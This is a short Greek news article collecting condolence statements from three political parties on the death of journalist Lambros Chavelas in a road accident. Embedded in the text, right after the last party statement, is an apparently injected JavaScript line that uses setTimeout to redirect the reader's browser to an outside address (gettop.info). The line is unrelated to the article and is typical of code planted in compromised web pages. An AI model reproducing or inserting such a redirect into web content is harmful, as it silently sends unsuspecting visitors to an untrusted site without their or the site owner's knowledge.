Τα κόμματα για την απώλεια του Λάμπρου Χαβέλα

0
4

 

Την βαθιά τους οδύνη για την απώλεια του δημοσιογράφου Λάμπρου Χαβέλα εξέφρασαν με ανακοίνωσή τους, ΣΥΡΙΖΑ, ΝΔ και Ανεξάρτητοι Έλληνες.

«Ο πρόωρος χαμός σε τροχαίο δυστύχημα του δημοσιογράφου Λάμπρου Χαβέλα μας γεμίζει με θλίψη. Η διαδρομή του Λ. Χαβέλα στον χώρο της δημοσιογραφίας χαρακτηρίζεται από επαγγελματισμό, ήθος και πάθος για τα θέματα με τα οποία ασχολήθηκε. Εκφράζουμε τα θερμά μας συλλυπητήρια στην οικογένεια, τους οικείους και τους συναδέλφους του», αναφέρει σε ανακοίνωσή του το γραφείου Τύπου του ΣΥΡΙΖΑ.

«Βαθιά θλίψη προκαλεί η αδόκητη απώλεια του συναδέλφου Λάμπρου Χαβέλα. Ιδιαίτερα αγαπητός στην δημοσιογραφική οικογένεια, ξεχώρισε για το ήθος, την επαγγελματική του ευσυνειδησία αλλά και για την εργατικότητά του. Εκφράζουμε στους οικείους του τα ειλικρινή μας συλλυπητήρια», αναφέρει σε ανακοίνωση του το Γραφείο Τύπου της ΝΔ .

Η συλλυπητήρια δήλωση της εκπροσώπου των ΑΝΕΛ, Μανταλένας Παπαδόπουλου για τον ξαφνικό χαμό του δημοσιογράφου, Λάμπρου Χαβέλα:

«Οι ΑΝΕΞΑΡΤΗΤΟΙ ΕΛΛΗΝΕΣ εκφράζουμε τη βαθύτατη θλίψη μας για τον ξαφνικό, πρόωρο και άδικο χαμό του δημοσιογράφου Λάμπρου Χαβέλα σε τροχαίο δυστύχημα. Ένας νέος άνθρωπος, που ξεχώριζε για το ήθος του και την εργατικότητά του στο δημοσιογραφικό επάγγελμα και πατέρας ενός ανήλικου παιδιού, έφυγε τόσο αναπάντεχα και τόσο παράλογα. Κρίμα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here